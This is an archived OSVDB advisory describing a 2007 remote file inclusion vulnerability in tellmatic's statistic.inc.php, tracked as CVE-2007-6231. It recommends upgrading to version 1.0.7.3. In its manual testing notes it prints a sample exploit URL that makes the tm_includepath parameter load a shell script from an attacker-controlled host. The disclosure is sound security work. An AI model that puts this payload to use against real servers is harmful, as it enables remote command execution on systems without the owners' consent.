tellmatic statistic.inc.php tm_includepath Variable Remote File Inclusion

2007-12-01T00:00:00
ID OSVDB:39690
Type osvdb
Reporter OSVDB
Modified 2007-12-01T00:00:00

Description

Vulnerability Description

tellmatic contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to 'statistic.inc.php' not properly sanitizing user input supplied to the 'tm_includepath' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

Solution Description

Upgrade to version 1.0.7.3 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

Short Description

tellmatic statistic.inc.php tm_includepath Variable Remote File Inclusion

Manual Testing Notes

http://[target]/tellmatic/include/statistic.inc.php?tm_includepath=http://[attacker]/shell.txt?

References:

Secunia Advisory ID:27895 Related OSVDB ID: 1019179 Related OSVDB ID: 39691 Related OSVDB ID: 39692 Related OSVDB ID: 39693 Mail List Post: http://www.attrition.org/pipermail/vim/2007-December/001854.html ISS X-Force ID: 38801 Generic Exploit URL: http://www.milw0rm.com/exploits/4684 CVE-2007-6231 Bugtraq ID: 26678